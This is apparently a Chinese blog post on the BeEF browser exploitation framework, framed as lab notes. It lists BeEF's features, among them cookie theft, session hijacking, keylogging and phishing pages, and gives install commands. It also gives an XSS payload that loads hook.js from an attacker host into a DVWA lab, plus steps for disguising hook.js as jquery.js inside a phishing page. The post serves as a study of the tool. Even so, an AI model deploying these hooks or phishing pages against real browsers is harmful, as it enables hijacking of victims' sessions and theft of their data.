首页 > 其他分享 >BeEF 网页钓鱼平台

BeEF 网页钓鱼平台

时间:2024-10-09 19:12:07浏览次数:7  
标签:www 网页 BeEF 钓鱼 js hook html 浏览器

BeEF 网页钓鱼平台

BeEF 介绍

  • BeEF 全称 The Brower Exploitation FrameWork 是一款针对浏览器的浏览器渗透测试工具,使用Ruby 语言开发的 用于实现对XSS 漏洞的攻击和利用
    BeEF 主要是往网页中插入一段名为hook.js 的JS 脚本代码,如果浏览器访问了 有 hook.js(钩子)的页面 就会被 hook(钩住)勾连的浏览器会执行初始代码 返回一些信息 接着目标主机会每隔一段时间 默认为疫苗 就会向BeEF 服务器发送一个请求询问是否有新的代码需要执行

功能介绍

  1. 信息搜集
    • 可以实现网络发现 主机信息获取 cookie获取,会话劫持,获取键盘记录,获取插件信息等功能
  2. 持久化控制
    • 可以实现确认弹框,小窗口和中间人攻击
  3. 社会工程学攻击:
    • 可以实现点击劫持,弹窗警告,虚假页面钓鱼页面等攻击
  4. 渗透攻击
    • 可以实现内网渗透,CSRF跨站请求伪造攻击,DDOS攻击,还可以结合Metasploit 使用

安装和使用

# 安装
apt-get install beef-xss
# 启动
beef-xss # 首次启动需要输入新密码
# 管理界面地址
http://127.0.0.1:3000/ui/panel
# 配置文件
/usr/share/beef-xss/config.yaml
  • 启动之后 打开管理地址页面 左侧 为上线的设备 也就是目标的浏览器 右侧是各种功能 比如获取定位 浏览器弹窗等功能 不过需要有设备上线才能显示
  • 使用这个有两个方法一个是 在有xss 漏洞的地方将 这个东西插进去获取
  • 第二个方法则是 使用嵌入了钩子的钓鱼页面 只要对方打开 这边就可以获取到
  • 笔记两种都会记录不过都是局域网下的 使用内网穿透 尝试使用第二种的时候发现 无法使用第一种则是由于没有靶场 并没有进行实战

第一种

  • 使用靶场 dvva 找到XSS 漏洞 并把靶场的防御等级设置为低 将以下代码输入到 提交框中即可
<script src="http://<IP>:3000/hook.js></script>"

第二种

  • 将攻击代码放到钓鱼网站里
  • 打开 apache2 服务器
service apache2 start
  • 切换目录到 /var/www/html 输入 以下命令
cd /var/www/html 
sudo wget http://127.0.0.1:3000/hook.js -O /var/www/html/jquery.js
# 或者
sudo wget http://192.168.1.11:3000/hook.js -O /var/www/html/jquery.js
  • 编辑 /var/www/html/index.html 将以下代码插入进去
<script src='./jquery.js'></script>
  • 访问 kali 80端口的 apache 服务器 这个时候会出现 默认的index.html
  • 同时打开后台管理页面 就可以看到主机上线了

在左侧的commands 中找到 Create Alert Delog 点击 一下之后点击右侧的excute 即可进行弹窗攻击

标签:www,网页,BeEF,钓鱼,js,hook,html,浏览器
From: https://www.cnblogs.com/ZapcoMan/p/18454945

相关文章

  • web网页制作(Radio Shack)
    <!doctypehtml>BootstrapdemoRadioShackStoreLocatorSteve'sWorkbenchRadioShackServicesElectronicRepairAboutRadioShackProductSupportRockandRollOnTourUnitedAgainstCrime......
  • 传奇霸业网页游戏单机版安装教程+GM后台+无需虚拟机
    今天给大家带来一款单机游戏的架设:传奇霸业网页游戏。另外:本人承接各种游戏架设(单机+联网)本人为了学习和研究软件内含的设计思想和原理,带了架设教程仅供娱乐。教程是本人亲自搭建成功的,绝对是完整可运行的,踩过的坑都给你们填上了。如果你是小白也没问题,跟着教程走也是可以搭建成......
  • 数据库mysql链接网页打不开 mysql数据库连接失败的原因
    MySQL数据库连接失败可能有以下几个常见原因:网络问题:服务器与客户端之间的网络不通。MySQL服务所在的服务器防火墙设置阻止了外部访问。MySQL服务未启动:确认MySQL服务是否已经正常启动。配置错误:连接字符串中的主机名、端口、用户名或密码错误。配置文件(my.cn......
  • 如何修改php网页内容
    要修改PHP网页的内容,你可以按照以下步骤进行:打开文件:使用文本编辑器或集成开发环境(IDE)如VSCode,PhpStorm等打开包含你要修改内容的PHP文件。定位内容:在文件中找到你想要修改的具体内容。PHP文件通常包含HTML标记以及PHP代码块。确保你清楚哪些部分是HTML,哪些是动态生成的......
  • 网页跳转小程序
    在现今的互联网时代,用户的在线体验对产品和服务的成功至关重要。随着微信、支付宝等移动应用的普及,小程序逐渐成为用户与服务之间的新型连接方式。小程序(MiniPrograms)作为一种轻量级的应用,不需要用户下载安装,而是通过一个易于访问的入口提供各种功能。这种便捷的特性,使得小程......
  • 528.大气的家具定制设计公司网站 大学生期末大作业 Web前端网页制作 html+css+js
    目录一、网页概述二、网页文件 三、网页效果四、代码展示1.html2.CSS3.JS五、总结1.简洁实用2.使用方便3.整体性好4.形象突出5.交互式强六、更多推荐欢迎光临仙女的网页世界!这里有各行各业的Web前端网页制作的案例,样式齐全新颖,并持续更新!感谢CSDN,提供了这......
  • 获取网页的markdown
    #获取网页源码importreimporthtml2textimportrequestsdefpreprocess_html(html):#删除没有src属性的img标签processed_html=re.sub(r'<img(?![^>]*\ssrc=)[^>]*>','',html)returnprocessed_htmlpage_url='https......
  • 优化网页抓取:轻松提升抓取效率的小妙招
    今天来聊一个实用的话题——如何优化网页抓取。无论你是数据科学家、爬虫开发者,还是对网页数据感兴趣的普通网友,相信这篇文章都能帮到你。一、明确目标,规划先行在开始抓取网页之前,最重要的一步就是明确你的抓取目标。你想抓取哪些网站的数据?需要哪些字段?抓取频率是多少?这些问题都得......
  • 如果网页出现乱码我们一般使用什么来解决
    解决网页乱码问题的一般方法包括以下几个步骤:检查和统一字符编码:确认网页的实际内容编码(如UTF-8、GBK等)。统一网页、数据库和应用程序中的字符编码。设置HTTP响应头:确保服务器返回的 Content-Type 响应头包含正确的字符集,例如 Content-Type:text/html;charse......
  • 怎样保存网页内容,如何保存网页全部内容
    保存网页内容可以根据不同的需求和场景采用不同的方法。以下是几种常见的保存网页内容的方法:浏览器自带功能保存为完整网页:大多数现代浏览器都提供了直接保存网页的功能。在浏览器菜单中选择“文件”->“另存为”,可以选择保存为“完整网页”,这样会将网页的所有资源(如图片、CS......